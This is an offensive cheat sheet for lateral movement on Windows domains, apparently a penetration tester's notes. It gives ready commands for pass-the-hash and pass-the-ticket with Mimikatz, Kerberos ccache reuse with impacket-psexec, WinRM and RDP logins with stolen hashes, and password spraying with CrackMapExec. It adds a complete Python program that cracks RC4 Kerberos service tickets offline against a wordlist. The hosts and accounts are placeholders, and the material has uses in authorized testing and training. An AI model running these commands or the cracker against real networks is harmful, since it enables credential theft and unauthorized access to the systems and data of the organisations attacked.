Lateral Movement
There aren't many ways to move laterally on Windows; the main ones are listed below.
psexec
RDP
WinRM
SSH (not likely)
PTH (pass the hash) can be used with most of them, so a captured NT hash is usually as good as the password.
Mimikatz Ticket PTT
Inject a stolen .kirbi into the current logon session, then open a PowerShell session on the target. WinRM authenticates with the injected Kerberos ticket, so use the hostname (an IP address would not match the ticket's SPN and Kerberos would fail).
Enable-PSRemoting
mimikatz.exe "kerberos::ptt C:\Users\Public\ticketname.kirbi" "exit"
Enter-PSSession -ComputerName ECORP
WinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
-r switches evil-winrm to Kerberos auth against that realm; the realm needs an entry in /etc/krb5.conf.
PTH with Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
sekurlsa::pth needs local admin on the host it runs on. The /run: process (typically powershell.exe) gets a logon session carrying the NTLM hash and can then be used for psexec, WinRM or RDP against other hosts.
Pass The Ccache (PTC)
Grab the ccache from the remote host and point KRB5CCNAME at it:
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX
Make sure the clock is synced with the DC; Kerberos rejects requests when the skew is more than 5 minutes by default:
sudo ntpdate -u 192.168.1.231
Psexec to the target:
impacket-psexec [email protected] -dc-ip 192.168.1.231 -k -no-pass
Don't include the domain name in the psexec target. If you are still having issues with the command you can drop the username as well; with -k impacket takes the principal from the ccache. The target has to be the hostname that matches the service ticket's SPN, not an IP address, or Kerberos authentication will fail.
Cracking Ccache
Convert the ccache file into a kirbi file using a converter:
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi
Convert the kirbi into a crackable hash:
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt
This only pays off for service tickets: the hash line is the ticket's encrypted part, keyed with the service account's NT hash, so cracking it recovers that account's password (the same thing Kerberoasting does). RC4 (etype 23) tickets crack fast; AES tickets are far slower.
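What actually happens to that ticket_hash.txt line, as an added example that is not code from this page, from kirbi2john or from john: the kirbi ASN.1 parsing that kirbi2john does is skipped, and instead a constructed service ticket is encrypted under a known NT hash (RC4-HMAC, RFC 4757), written in the $krb5tgs$23$ layout john and hashcat read, and then cracked offline against a small wordlist. The service account, SPN, password and wordlist are all made up for the example.

```python
"""RC4-HMAC (etype 23) service-ticket cracking: what kirbi2john + john do.

Added example, not from the original page. Everything below (svc_sql,
ECORP.LOCAL, the SPN, "Summer2019!", the wordlist) is constructed.
"""
import hmac
import os
import struct
from hashlib import md5
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF
TGS_KEY_USAGE = 2  # key usage for a ticket's EncTicketPart (RFC 4120 7.5.1)


def md4(msg: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks md4 on OpenSSL 3."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    padded = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", len(msg) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, tuple(range(16)), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(padded), 64):
        x = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for j in range(16):
                a = rotl((a + fn(b, c, d) + x[order[j]] + k) & MASK, shifts[j % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates the old d
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC key itself."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (the same call encrypts and decrypts)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> Tuple[bytes, bytes]:
    """RFC 4757 encryption: returns (checksum, ciphertext) as stored in the ticket."""
    confounder = os.urandom(8)
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return checksum, rc4(k3, confounder + plaintext)


def kirbi2john_line(user: str, realm: str, spn: str, checksum: bytes, edata: bytes) -> str:
    """$krb5tgs$23$ layout for an RC4 service ticket; the starred fields are labels only."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def crack(hash_line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Per-candidate work john does for this format: derive keys, decrypt, verify HMAC."""
    fields = hash_line.split("$")
    checksum, edata = bytes.fromhex(fields[-2]), bytes.fromhex(fields[-1])
    for candidate in wordlist:
        k1 = hmac.new(nt_hash(candidate), struct.pack("<I", TGS_KEY_USAGE), md5).digest()
        k3 = hmac.new(k1, checksum, md5).digest()
        plain = rc4(k3, edata)  # confounder || EncTicketPart if the key is right
        if hmac.compare_digest(hmac.new(k1, plain, md5).digest(), checksum):
            return candidate
    return None


def demo() -> Tuple[str, Optional[str]]:
    """Build a constructed ticket for a made-up service account, then crack it."""
    service_password = "Summer2019!"  # constructed; this is what cracking recovers
    fake_enc_ticket_part = b"constructed EncTicketPart placeholder bytes"  # constructed
    checksum, edata = rc4_hmac_encrypt(nt_hash(service_password), TGS_KEY_USAGE, fake_enc_ticket_part)
    line = kirbi2john_line("svc_sql", "ECORP.LOCAL", "MSSQLSvc/sql01.ecorp.local:1433", checksum, edata)
    found = crack(line, ["password", "Welcome1", "Summer2019!", "P@ssw0rd"])
    return line, found


if __name__ == "__main__":
    hash_line, password = demo()
    print(hash_line)
    print("cracked:", password)
```

nt_hash("password") must come out as the well-known 8846f7eaee8fb117ad06bdd830b7586c, which is the quick sanity check that the MD4 is right. The per-candidate loop in crack() is the whole cost model of this attack: one MD4, three HMAC-MD5s and one RC4 per guess, no salt, which is why etype 23 tickets fall to a wordlist in seconds while AES tickets (PBKDF2 with 4096 iterations) do not.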
RDP
Impacket's rdp_check.py script is good for checking whether credentials (or a hash) actually grant RDP access before starting a client:
impacket-rdp_check morph3:[email protected]
python3 /opt/impacket/examples/rdp_check.py ecorp/[email protected]
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456
The /pth: variant only works when the target has Restricted Admin mode enabled (DisableRestrictedAdmin set to 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); otherwise you need the plaintext password.
CrackMapExec
Swiss-army-knife tool, handy for password spraying:
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --shares
--local-auth sprays local accounts instead of domain ones; --continue-on-success keeps going after the first hit so every valid pair shows up. Check the domain lockout policy before spraying passwords.